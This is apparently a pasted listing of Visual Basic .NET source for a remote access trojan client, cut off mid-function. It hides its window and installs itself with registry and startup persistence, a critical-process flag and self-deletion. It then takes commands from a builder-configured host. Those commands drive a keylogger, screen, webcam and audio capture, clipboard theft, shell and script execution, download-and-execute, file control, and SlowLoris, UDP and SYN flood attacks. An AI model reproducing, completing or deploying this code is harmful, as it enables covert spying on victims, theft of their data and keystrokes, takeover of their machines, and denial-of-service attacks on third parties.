· 6 years ago · Jan 01, 2020, 09:26 PM
1Imports System.Windows
2Imports System
3Imports System.Windows.Forms
4Imports System.Windows.Forms.Form
5Imports Microsoft.VisualBasic
6Imports System.Reflection
7Imports System.Net
8Imports System.Net.Sockets
9Imports System.Threading
10Imports System.IO
11Imports System.Runtime.InteropServices
12Imports System.Management
13Imports System.Text.RegularExpressions
14Imports System.Text
15Imports Microsoft.Win32
16Imports System.Net.NetworkInformation
17Imports System.Drawing
18Imports System.ServiceProcess
19
20Public Class EntryPoint
21 Public Shared Sub Main(args As [String]())
22 Dim FrmMain As New Form1
23 FrmMain.Size = New Size(0, 0)
24 FrmMain.ShowInTaskbar = False
25 FrmMain.Visible = False
26 FrmMain.Opacity = 0
27 Application.Run(FrmMain)
28 End Sub
29 End Class
30
31 Public Class Form1
32 Inherits Form
33 Dim client As TcpClient
34 Dim Connection As Thread
35 Dim enckey As String = "kT6ymNlgrm"
36 Dim screensending As Thread
37 Dim comp As Long
38 Dim res As String
39 Private Declare Function SetCursorPos Lib "user32" (ByVal X As Integer, ByVal Y As Integer) As Integer
40 Public Declare Sub mouse_event Lib "user32" Alias "mouse_event" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
41 Private Const MOUSEEVENTF_LEFTDOWN As Object = &H2
42 Private Const MOUSEEVENTF_LEFTUP As Object = &H4
43 Private Const MOUSEEVENTF_RIGHTDOWN As Object = &H8
44 Private Const MOUSEEVENTF_RIGHTUP As Object = &H10
45 Dim sl As New SlowLoris
46 Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
47 Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
48 Dim WithEvents logger As New Keylogger
49 Dim logs As String
50 Dim strin As String
51 Dim curntdir2 As String
52 Dim listviewfiles As New ListView
53 Dim tbmessage As New TextBox
54 Dim rtblogs As New RichTextBox
55 Dim chat As New Form
56 Dim discomousing As Thread
57
58#Region "API Declerations"
59 Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
60 Private Const SETDESKWALLPAPER As Integer = 20
61 Private Const UPDATEINIFILE As Long = &H1
62 Declare Function GetDesktopWindow Lib "user32" () As Long
63 Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Integer) As Long
64 Public Const WM_SYSCOMMAND As Long = &H112&
65 Public Const SC_SCREENSAVE As Long = &HF140&
66 Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
67 Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Integer, ByVal lpvParam As Long, ByVal fuWinIni As Long) As Long
68 Declare Function mciSend Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpszCommand As String, ByVal lpszReturnString As String, ByVal cchReturnLength As Long, ByVal hwndCallback As Long) As Long
69 Private Declare Function FindWindow Lib "user32.dll" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Int32
70 Private Declare Function ShowWindow Lib "user32.dll" (ByVal hwnd As IntPtr, ByVal nCmdShow As Int32) As Int32
71 Private Const SW_HIDE As Int32 = 0
72 Private Const SW_RESTORE As Int32 = 9
73 Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
74 Private Const SWP_HIDEWINDOW As Long = &H80
75 Private Const SWP_SHOWWINDOW As Long = &H40
76 <DllImport("ntdll.dll", SetLastError:=True, CharSet:=CharSet.Auto)>
77 Public Shared Sub RtlSetProcessIsCritical(ByVal bValue As Boolean, ByRef bVal2 As Boolean, ByVal bVal3 As Boolean)
78 End Sub
79 <DllImport("winmm.dll")>
80 Private Shared Function mciSendString(ByVal command As String, ByVal buffer As StringBuilder, ByVal bufferSize As Integer, ByVal hwndCallback As IntPtr) As Integer
81 End Function
82#End Region
83#Region "Webcam Declerations"
84 Dim picCapture As New PictureBox
85 Const WM_CAP As Short = &H400S
86 Const WM_CAP_DRIVER_CONNECT As Integer = WM_CAP + 10
87 Const WM_CAP_DRIVER_DISCONNECT As Integer = WM_CAP + 11
88 Const WM_CAP_EDIT_COPY As Integer = WM_CAP + 30
89 Const WM_CAP_SET_PREVIEW As Integer = WM_CAP + 50
90 Const WM_CAP_SET_PREVIEWRATE As Integer = WM_CAP + 52
91 Const WM_CAP_SET_SCALE As Integer = WM_CAP + 53
92 Const WS_CHILD As Integer = &H40000000
93 Const WS_VISIBLE As Integer = &H10000000
94 Const SWP_NOMOVE As Short = &H2S
95 Const SWP_NOSIZE As Short = 1
96 Const SWP_NOZORDER As Short = &H4S
97 Const HWND_BOTTOM As Short = 1
98 Dim iDevice As Integer = 0
99 Dim hHwnd As Integer
100 Declare Function SendWebcam Lib "user32" Alias "SendMessageA" (ByVal hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As Object) As Integer
101 Declare Function SetWebcamPos Lib "user32" Alias "SetWindowPos" (ByVal hwnd As Integer, ByVal hWndInsertAfter As Integer, ByVal x As Integer, ByVal y As Integer, ByVal cx As Integer, ByVal cy As Integer, ByVal wFlags As Integer) As Integer
102 Declare Function DestroyWebcam Lib "user32" (ByVal hndw As Integer) As Boolean
103 Declare Function capCreateCaptureWindowA Lib "avicap32.dll" (ByVal lpszWindowName As String, ByVal dwStyle As Integer, ByVal x As Integer, ByVal y As Integer, ByVal nWidth As Integer, ByVal nHeight As Short, ByVal hWndParent As Integer, ByVal nID As Integer) As Integer
104 Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
105 Dim webcamsending As Thread
106#End Region
107#Region "Builder Parameters and Keylogger Hook"
108 Dim installenable, dropinsubfolder, startupenable, startupdir, startupuser, startuplocal, regpersistence, melt, delay, criticalProcess, processPersistance, hideProcess, runPEinjection, protectProcess, systemAttribute, hiddenAttribute As Boolean
109 Dim dropsubfoldername, dropname, path, runPEinjectionTarget As String
110 Dim delaytime As Integer
111 Dim WithEvents reg As New RegistryWatcher
112 Dim objMutex As Mutex
113 Sub New()
114 logger.CreateHook()
115 End Sub
116#End Region
117#Region "Connection"
118 Sub Connect()
119TryAgain:
120 Try
121 client = New TcpClient("%HOST%", 1550551)
122 Send(AES_Encrypt("NewConnection|" & GetInfo() & "|" & SystemInformation.UserName.ToString() & "|" & SystemInformation.ComputerName.ToString() & "|" & My.Computer.Info.OSFullName & "|" & My.Computer.Info.OSVersion & "|" & getpriv(), enckey))
123 client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
124 Catch ex As Exception
125 GoTo TryAgain
126 End Try
127 End Sub
128 Sub Read(ByVal ar As IAsyncResult)
129 Dim message As String
130 Try
131 Dim reader As New StreamReader(client.GetStream())
132 message = reader.ReadLine()
133 message = AES_Decrypt(message, enckey)
134 parse(message)
135 client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
136 Catch ex As Exception
137 Thread.Sleep(4000)
138 Connect()
139 End Try
140 End Sub
141 Public Sub Send(ByVal message As String)
142 Try
143 Dim writer As New StreamWriter(client.GetStream())
144 writer.WriteLine(message)
145 writer.Flush()
146 Catch
147 End Try
148 End Sub
149 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
150 Try
151 objMutex = New Mutex(False, "%MUTEX%")
152 If objMutex.WaitOne(0, False) = False Then
153 objMutex.Close()
154 objMutex = Nothing
155 Application.ExitThread()
156 End
157 End If
158
159 installenable = "%INSTALL%"
160 dropinsubfolder = "%FILENAME%"
161 dropsubfoldername = "%SUBFOLDER%"
162 startupenable = "%STARTUP%"
163 startupdir = "%STARTUPDIR%"
164 startupuser = "%STARTUPUSER%"
165 startuplocal = "%STARTUPLOCAL%"
166 regpersistence = "%REGPERSISTANCE%"
167 melt = "%MELT%"
168 delay = "%DELAY%"
169 dropname = ""%EXENAME%""
170 path = ""%PATH%""
171 delaytime = "%DELAYTIME%"
172 criticalProcess = "%CRITICALPROCESS%"
173 processPersistance = "%PROCESSPERSISTANCE%"
174 hideProcess = "%HIDEPROCESS%"
175 protectProcess = "%PROCTECTPROCESS%"
176 runPEinjection = "%RUNPEINJECTION%"
177 runPEinjectionTarget = "%RUNPEINJECTIONTARGET%"
178 hiddenAttribute = "%HIDDENATTRIBUTE%"
179 systemAttribute = "%SYSTEMATTRIBUTE%"
180
181 If delay = True Then
182 Thread.Sleep(delaytime)
183 End If
184
185 If Application.ExecutablePath.Contains("Temp") Or Application.ExecutablePath.Contains("AppData") Or Application.ExecutablePath.Contains("Program") Then
186 GoTo 1
187 End If
188
189 If installenable = True Then
190 If dropinsubfolder = True Then
191 If Not My.Computer.FileSystem.DirectoryExists(getPath(path) & "\" & dropsubfoldername) Then
192 My.Computer.FileSystem.CreateDirectory(getPath(path) & "\" & dropsubfoldername)
193 End If
194 IO.File.WriteAllBytes(getPath(path) & "\" & dropsubfoldername & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
195 domelt(getPath(path) & "\" & dropsubfoldername & "\" & dropname)
196 Exit Sub
197 Else
198 IO.File.WriteAllBytes(getPath(path) & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
199 domelt(getPath(path) & "\" & dropname)
200 Exit Sub
201 End If
202 End If
203
2041: If startupenable = True Then
205 If startupdir = True Then
206 Dim nam As String = New IO.FileInfo(Application.ExecutablePath).Name
207 File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.Startup).ToString & "\" & nam, IO.File.ReadAllBytes(Application.ExecutablePath))
208 ElseIf startupuser = True Then
209 Dim regkey As RegistryKey
210 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
211 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
212 ElseIf startuplocal = True Then
213 If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
214 Dim regkey As RegistryKey
215 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
216 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
217 If regpersistence = True Then
218 reg.AddWatcher(RegistryWatcher.HKEY_ROOTS.HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
219 End If
220 Else
221 Dim regkey As RegistryKey
222 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
223 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
224 End If
225 End If
226 End If
227
228 If systemAttribute = True Then
229 SetAttr(Application.ExecutablePath, FileAttribute.System)
230 End If
231 If hiddenAttribute = True Then
232 SetAttr(Application.ExecutablePath, FileAttribute.Hidden)
233 End If
234
235 If criticalprocess = True Then
236 System.Diagnostics.Process.EnterDebugMode()
237 RtlSetProcessIsCritical(True, False, False)
238 System.Diagnostics.Process.LeaveDebugMode()
239 End If
240
241 Connection = New Thread(AddressOf Connect)
242 Connection.Start()
243
244 Catch
245 End Try
246 End Sub
247#End Region
248#Region "Function Callers"
249 Sub parse(ByVal msg As String)
250 Try
251 If msg = "Disconnected" Then
252 Connection.Abort()
253 Connection = New Thread(AddressOf Connect)
254 Connection.Start()
255 If criticalprocess = True Then
256 System.Diagnostics.Process.EnterDebugMode()
257 RtlSetProcessIsCritical(False, False, False)
258 System.Diagnostics.Process.LeaveDebugMode()
259 End If
260 ElseIf msg = "SystemInformation" Then
261 Send(AES_Encrypt("SystemInformation|" & getsystem() & GetDeepInfo(), enckey))
262 ElseIf msg = "GetProcess" Then
263 sendprocess()
264 ElseIf msg.StartsWith("Kill") Then
265 KillProcesses(msg)
266 ElseIf msg.StartsWith("New") Then
267 System.Diagnostics.Process.Start(msg.Split("|")(1))
268 ElseIf msg = "Software" Then
269 getinstalledsoftware()
270 ElseIf msg.StartsWith("RD") Then
271 comp = msg.Split("|")(1)
272 res = msg.Split("|")(2)
273 screensending = New Thread(AddressOf sendscreen)
274 screensending.Start()
275 ElseIf msg = "Stop" Then
276 screensending.Abort()
277 ElseIf msg = "GetPcBounds" Then
278 Send(AES_Encrypt("PCBounds" & My.Computer.Screen.Bounds.Height & "x" & My.Computer.Screen.Bounds.Width, enckey))
279 ElseIf msg.Contains("SetCurPos") Then
280 MouseMov(msg)
281 ElseIf msg.StartsWith("OpenWebsite") Then
282 openwebsite(msg.Replace("OpenWebsite", ""))
283 ElseIf msg.StartsWith("DandE") Then
284 dande(msg.Replace("DandE", ""))
285 ElseIf msg.StartsWith("MSG") Then
286 MessageBox.Show(GetBetween(msg, "Body: ", " Icon:", 0), GetBetween(msg, "Title: ", " Body:", 0), MessageBoxButton(GetBetween(msg, "Button: ", " End", 0)), MessageBoxIcn(GetBetween(msg, "Icon: ", " Button:", 0)))
287 ElseIf msg = "GetHostsFile" Then
288 loadhostsfile()
289 ElseIf msg.StartsWith("SaveHostsFile") Then
290 savehostsfile(msg.Replace("SaveHostsFile", ""))
291 ElseIf msg = "GetCPImage" Then
292 getclipboardimage()
293 ElseIf msg = "GetCPText" Then
294 getclipboardtext()
295 ElseIf msg.StartsWith("SaveCPText") Then
296 setclipboardtext(msg.Replace("SaveCPText", ""))
297 ElseIf msg.StartsWith("Shell") Then
298 runshell(msg.Replace("Shell", ""))
299 ElseIf msg = "GetKeyLogs" Then
300 Send(AES_Encrypt("KeyLogs" & logs, enckey))
301 ElseIf msg = "DelKeyLogs" Then
302 logs = ""
303 ElseIf msg = "RecordingStart" Then
304 audio_start()
305 ElseIf msg = "RecordingStop" Then
306 audio_stop()
307 ElseIf msg = "RecordingDownload" Then
308 audio_get()
309 ElseIf msg = "GetTCPConnections" Then
310 Send(AES_Encrypt("TCPConnections" & GetTCPConnections(), enckey))
311 ElseIf msg.StartsWith("GetStartup") Then
312 GetStartupEntries()
313 ElseIf msg.StartsWith("UpdateFromLink") Then
314 UpdatefromLink(msg.Replace("UpdateFromLink", ""))
315 ElseIf msg.StartsWith("UpdatefromFile") Then
316 UpdateFromFile(msg.Replace("UpdatefromFile", ""))
317 ElseIf msg.StartsWith("ExecuteFromLink") Then
318 ExecutefromLink(msg.Replace("ExecuteFromLink", ""))
319 ElseIf msg.StartsWith("ExecutefromFile") Then
320 ExecutefromFile(msg.Replace("ExecutefromFile", ""))
321 ElseIf msg = "Restart" Then
322 rstart()
323 ElseIf msg = "Uninstall" Then
324 delete(3)
325 ElseIf msg.StartsWith("RemovefromStartup") Then
326 removefromstartup(msg.Replace("RemovefromStartup", ""))
327 ElseIf msg = "ListDrives" Then
328 listdrives()
329 ElseIf msg.StartsWith("ListFiles") Then
330 showfiles(msg.Replace("ListFiles", ""))
331 ElseIf msg.Contains("mkdir") Then
332 createnewdirectory(msg.Replace("mkdir", ""))
333 ElseIf msg.Contains("rmdir") Then
334 deletedirectory(msg.Replace("rmdir", ""))
335 ElseIf msg.Contains("rnfolder") Then
336 renamedirectory(msg.Replace("rnfolder", "").Split("|")(0), msg.Replace("rnfolder", "").Split("|")(1))
337 ElseIf msg.Contains("mvdir") Then
338 movedirectory(msg.Replace("mvdir", "").Split("|")(0), msg.Replace("mvdir", "").Split("|")(1), msg.Replace("mvdir", "").Split("|")(2))
339 ElseIf msg.Contains("cpdir") Then
340 copydirectory(msg.Replace("cpdir", "").Split("|")(0), msg.Replace("cpdir", "").Split("|")(1), msg.Replace("cpdir", "").Split("|")(2))
341 ElseIf msg.Contains("mkfile") Then
342 CreateNewFile(msg)
343 ElseIf msg.Contains("rmfile") Then
344 deletefile(msg.Replace("rmfile", "").Split("|")(0))
345 ElseIf msg.Contains("rnfile") Then
346 renamefile(msg.Replace("rnfile", "").Split("|")(0), msg.Replace("rnfile", "").Split("|")(1))
347 ElseIf msg.Contains("movefile") Then
348 movefile(msg.Replace("movefile", "").Split("|")(0), msg.Replace("movefile", "").Split("|")(1), msg.Replace("move", "").Split("|")(2))
349 ElseIf msg.Contains("copyfile") Then
350 copyfile(msg.Replace("copyfile", "").Split("|")(0), msg.Replace("copyfile", "").Split("|")(1), msg.Replace("copyfile", "").Split("|")(2))
351 ElseIf msg.StartsWith("sharefile") Then
352 sharefile(msg.Replace("sharefile", ""))
353 ElseIf msg.StartsWith("FileUpload") Then
354 UploadFile(msg.Replace("FileUpload", ""))
355 ElseIf msg = "ListWebcamDevices" Then
356 listdevices()
357 ElseIf msg = "WebcamStart" Then
358 webcamsending = New Thread(AddressOf getwebcam)
359 webcamsending.Start()
360 ElseIf msg.StartsWith("SlowLorisStart") Then
361 StartSlowLoris(msg.Replace("SlowLorisStart", ""))
362 ElseIf msg.StartsWith("SlowLorisStop") Then
363 sl.StopFlood()
364 ElseIf msg.StartsWith("UDPStart") Then
365 StartUDP(msg.Replace("UDPStart", ""))
366 ElseIf msg = "UDPStop" Then
367 If UDPFlood.FloodRunning = True Then
368 UDPFlood.StopUDPFlood()
369 End If
370 ElseIf msg.StartsWith("SYNStart") Then
371 StartSYN(msg.Replace("SYNStart", ""))
372 ElseIf msg = "SYNStop" Then
373 If SynFlood.IsRunning = True Then
374 SynFlood.StopSynFlood()
375 End If
376 ElseIf msg.StartsWith("HTMLScripting") Then
377 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html", msg.Replace("HTMLScripting", ""))
378 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html")
379 ElseIf msg.StartsWith("VBSScripting") Then
380 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs", msg.Replace("VBSScripting", ""))
381 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs")
382 ElseIf msg.StartsWith("BATScripting") Then
383 IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat", msg.Replace("BATScripting", ""))
384 System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat")
385 ElseIf msg.StartsWith("GetThumbNails") Then
386 SendThumbNail()
387 ElseIf msg.Contains("Website") Then
388 openwebsite(msg.Split("|")(1))
389 ElseIf msg.Contains("logoff") Then
390 Shell("shutdown /l")
391 ElseIf msg.Contains("shutdwn") Then
392 Shell("shutdown /s")
393 ElseIf msg.Contains("restrt") Then
394 Shell("shutdown /r")
395 ElseIf msg.Contains("Change") Then
396 My.Computer.Network.DownloadFile(msg.Split("|")(0), My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg")
397 SystemParametersInfo(SETDESKWALLPAPER, 0, My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg", UPDATEINIFILE)
398 ElseIf msg.Contains("Spk") Then
399 Dim SAPI As Object
400 SAPI = CreateObject("SAPI.spvoice")
401 SAPI.Speak(msg.Split("|")(1).ToString)
402 ElseIf msg.Contains("UndoMouse") Then
403 SwapMouseButton(False)
404 ElseIf msg.Contains("SwapMouse") Then
405 SwapMouseButton(True)
406 ElseIf msg = "CloseCD" Then
407 mciSend("set CDAudio door closed", 0, 0, 0)
408 ElseIf msg = "OpenCD" Then
409 mciSend("set CDAudio door open", 0, 0, 0)
410 ElseIf msg.Contains("ShowIcons") Then
411 Dim hWnd As IntPtr
412 hWnd = FindWindow(vbNullString, "Program Manager")
413 If Not hWnd = 0 Then
414 ShowWindow(hWnd, SW_RESTORE)
415 End If
416 ElseIf msg.Contains("HideIcons") Then
417 Dim hWnd As IntPtr
418 hWnd = FindWindow(vbNullString, "Program Manager")
419 If Not hWnd = 0 Then
420 ShowWindow(hWnd, SW_HIDE)
421 End If
422 ElseIf msg.Contains("ShowTaskbar") Then
423 ShowTaskBar()
424 ElseIf msg.Contains("HideTaskbar") Then
425 HideTaskBar()
426 ElseIf msg = "StartDiscoMouse" Then
427 discomousing = New Thread(AddressOf discomouse)
428 discomousing.Start()
429 ElseIf msg = "StopDiscoMouse" Then
430 discomousing.Abort()
431 ElseIf msg = "WebcamStop" Then
432 webcamsending.Abort()
433 ElseIf msg = "GetServices" Then
434 SendServices()
435 ElseIf msg.StartsWith("ServiceAction") Then
436 Dim res As String = msg.Replace("ServiceAction", "")
437 PerformServiceAction(res.Split("|")(0), res.Split("|")(1))
438 End If
439 Catch
440 End Try
441 End Sub
442#End Region
443#Region "Other Variables"
444 Function getPath(ByVal input As String) As String
445 Select Case input
446 Case "Appdata Local"
447 Return Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData).ToString()
448 Case "Appdata Roaming"
449 Return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString()
450 Case "Temp"
451 Return My.Computer.FileSystem.SpecialDirectories.Temp.ToString()
452 Case "Program Files"
453 Return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).ToString()
454 Case "Programs"
455 Return Environment.GetFolderPath(Environment.SpecialFolder.Programs).ToString()
456 Case "Program Data"
457 Return Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData).ToString()
458 Case Else : Return Nothing
459 End Select
460 End Function
461 Sub domelt(ByVal path As String)
462 Try
463 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
464 p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & 3 & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote & "&" & ControlChars.Quote & path & ControlChars.Quote
465 p.CreateNoWindow = True
466 p.ErrorDialog = False
467 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
468 System.Diagnostics.Process.Start(p)
469 Application.Exit()
470 Catch
471 End Try
472 End Sub
473 Private Sub reg_RegistryChanged(M As RegistryWatcher.Monitor) Handles reg.RegistryChanged
474 Try
475 Dim regkey As RegistryKey
476 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
477 regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
478 Catch
479 End Try
480 End Sub
481#End Region
482#Region "Others"
483 Sub discomouse()
484 Try
485 Do
486 Dim mousepos As New System.Drawing.Point
487 mousepos.X = New Random().Next(0, My.Computer.Screen.Bounds.Height)
488 mousepos.Y = New Random().Next(0, My.Computer.Screen.Bounds.Width)
489 System.Windows.Forms.Cursor.Position = mousepos
490 Loop
491 Catch
492 End Try
493 End Sub
494 Sub KillProcesses(ByVal txt As String)
495 Try
496 txt = txt.Replace("Kill|", "")
497
498 For i As Integer = 0 To CountCharacter(txt, "|")
499 System.Diagnostics.Process.GetProcessesByName(txt.Split("|")(i).Remove(txt.Split("|")(i).Length - 4, 4))(0).CloseMainWindow()
500 Next
501 Catch
502 End Try
503 End Sub
504 Public Function CountCharacter(ByVal value As String, ByVal ch As Char) As Integer
505 Try
506 Dim cnt As Integer = 0
507 For Each c As Char In value
508 If c = ch Then cnt += 1
509 Next
510 Return cnt
511 Catch
512 Return Nothing
513 End Try
514 End Function
515 Sub openwebsite(ByVal url As String)
516 Try
517 System.Diagnostics.Process.Start(url)
518 Catch : End Try
519 End Sub
520 Sub dande(ByVal url As String)
521 Try
522 Dim web As New WebClient
523 web.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
524 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
525 Catch
526 End Try
527 End Sub
528 Private Function GetBetween(ByVal input As String, ByVal str1 As String, ByVal str2 As String, ByVal index As Integer) As String
529 Dim temp As String = Regex.Split(input, str1)(index + 1)
530 Return Regex.Split(temp, str2)(0)
531 End Function
532 Function MessageBoxButton(ByVal Text As String) As Object
533 Select Case Text
534 Case "AbortRetryIgnore"
535 Return MessageBoxButtons.AbortRetryIgnore
536 Case "OK"
537 Return MessageBoxButtons.OK
538 Case "OKCancel"
539 Return MessageBoxButtons.OKCancel
540 Case "RetryCancel"
541 Return MessageBoxButtons.RetryCancel
542 Case "YesNo"
543 Return MessageBoxButtons.YesNo
544 Case "YesNoCancel"
545 Return MessageBoxButtons.YesNoCancel
546 Case Else
547 Return MessageBoxButtons.OK
548 End Select
549 End Function
550 Function MessageBoxIcn(ByVal text As String) As Object
551 Select Case text
552 Case "Asterisk"
553 Return MessageBoxIcon.Asterisk
554 Case "Error"
555 Return MessageBoxIcon.Error
556 Case "Exclamation"
557 Return MessageBoxIcon.Exclamation
558 Case "Hand"
559 Return MessageBoxIcon.Hand
560 Case "Information"
561 Return MessageBoxIcon.Information
562 Case "None"
563 Return MessageBoxIcon.None
564 Case "Question"
565 Return MessageBoxIcon.Question
566 Case "Stop"
567 Return MessageBoxIcon.Stop
568 Case "Warning"
569 Return MessageBoxIcon.Warning
570 Case Else
571 Return MessageBoxIcon.None
572 End Select
573 End Function
574 Sub UpdatefromLink(ByVal url As String)
575 Try
576 My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe")
577 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
578 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
579 p.CreateNoWindow = True
580 p.ErrorDialog = False
581 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
582
583 Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
584 pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
585 pp.CreateNoWindow = True
586 pp.ErrorDialog = False
587 pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
588
589 System.Diagnostics.Process.Start(p)
590 System.Diagnostics.Process.Start(pp)
591
592 Application.Exit()
593 Catch
594 End Try
595 End Sub
596 Sub UpdateFromFile(ByVal txt As String)
597 Try
598 File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe", Convert.FromBase64String(txt))
599 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
600 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
601 p.CreateNoWindow = True
602 p.ErrorDialog = False
603 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
604
605 Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
606 pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
607 pp.CreateNoWindow = True
608 pp.ErrorDialog = False
609 pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
610
611 System.Diagnostics.Process.Start(p)
612 System.Diagnostics.Process.Start(pp)
613
614 Application.Exit()
615 Catch
616 End Try
617 End Sub
618 Sub ExecutefromLink(ByVal url As String)
619 Try
620 My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
621 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
622 Catch
623 End Try
624 End Sub
625 Sub ExecutefromFile(ByVal txt As String)
626 Try
627 File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe", Convert.FromBase64String(txt))
628 Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
629 Catch
630 End Try
631 End Sub
632 Sub rstart()
633 Try
634 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
635 p.Arguments = "/C ping 1.1.1.1 -n 1 -w 15 > Nul & " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
636 p.CreateNoWindow = True
637 p.ErrorDialog = False
638 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
639 System.Diagnostics.Process.Start(p)
640 Application.Exit()
641 Catch
642 End Try
643 End Sub
644 Sub delete(ByVal timeout As Integer)
645 Try
646 SetAttr(Application.ExecutablePath, FileAttribute.Normal)
647 Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
648 p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & timeout & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
649 p.CreateNoWindow = True
650 p.ErrorDialog = False
651 p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
652
653 If startuplocal = True Then
654 Dim regkey As RegistryKey
655 regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
656 If regpersistence = True Then
657 reg.RemoveWatcher(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
658 End If
